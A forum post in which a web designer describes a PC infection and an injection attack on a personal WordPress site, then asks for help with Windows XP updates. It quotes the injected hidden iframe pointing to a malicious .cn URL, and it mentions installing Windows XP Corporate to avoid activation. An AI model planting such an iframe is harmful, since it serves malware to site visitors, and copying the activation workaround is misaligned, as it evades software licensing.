Thanks for the responses, guys.
I did decide to just reformat. I hadn't even though of that option when I posted this - I've only just recently moved all my files to network storage. Incredibly lucky timing!
Master script maker: I forgot to mention this, but I was unable to stop the process - it would just give an error. It would also deselect itself if I left-clicked on it. If I booted without startup services, the process never showed up.
The plot thickens...
So after reformatting, I noticed that my site was messed up. I check the source and there's a malicious iframe. I am apparently the victim of an injection attack, and this is the code it is sticking on my site:
Our local copy of the files (on the networked storage) do not have this junk in them - only the ones on the server do.
<iframe src="http://findbigname.cn/ts/in.cgi?banner4" width=2 height=4 style="visibility: hidden"></iframe><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
Door #1, Door #2, or Door #3?!
Door #1: The timing of the injection seems to match the timing of my infection. A couple weeks ago there was a topic here on DD [edit: found the topic] about a virus going around that harvests your FTP logins and injects its malicious code onto whatever sites it can successfully access. The only site that seems to have been attacked, however, is my own (and not my clients'). I would think there would have been more sites affected if this was the method.
Are there some kind of logs I can check to see how and when the injection took place? I am a total server noob. I use DreamHost.
Door #2: Just a few days ago I posted a topic asking about the potential vulnerabilities of my contact form script:
The timing would make it pretty damn ironic, but this form has been up for a month or so.
Door #3: Could it be because my site is a WordPress site? I used DreamHost's one-click install service to install it, and it was the most current version at the time. This was about a month and a half ago. WordPress would tell me if it needed to be updated, right? It tells me when I need to update plugins, and I always do.
This wall of text just keeps going. You are a trooper.
Getting back to that reformatting...
About 8 years ago I bought a pre-built PC with Windows XP Home. A few years back I replaced that computer with one I put together. Since I didn't have a Windows disc from my pre-built, I downloaded one of those 9-in-1 Windows XP SP2 DVDs, and installed Windows XP Home from that, using my legitimate serial number and everything.
Activating Windows on the new machine, as I found out, was a nightmare. I had to call Microsoft and spend an hour on the phone with them. So this time after the reformat, I installed Windows XP Corporate instead, as it doesn't ask for activation.
As this was SP2, it needed a lot of updating. I always seem to have trouble getting Windows Update to do its thing on fresh XP installations, and so far this has been no different. First I set it to update at the next hour. Nothing. I then set it to download the updates and let me choose when to install them, waited an hour, and still nothing.
I'm pretty sure I'm doing it wrong, lol. I always have to toggle these options again and again and restart the computer to get the updates to start downloading. When I was finally able to get the first batch of updates to start, it downloaded and installed 34 updates.
And now it's stuck. It won't download updates no matter what I try or what options I pick. This is a totally new XP install - only mobo and video card drivers installed. Is there a way to manually check for updates? Should I bite the bullet and install Home again?
Longest post ever. Thanks for reading!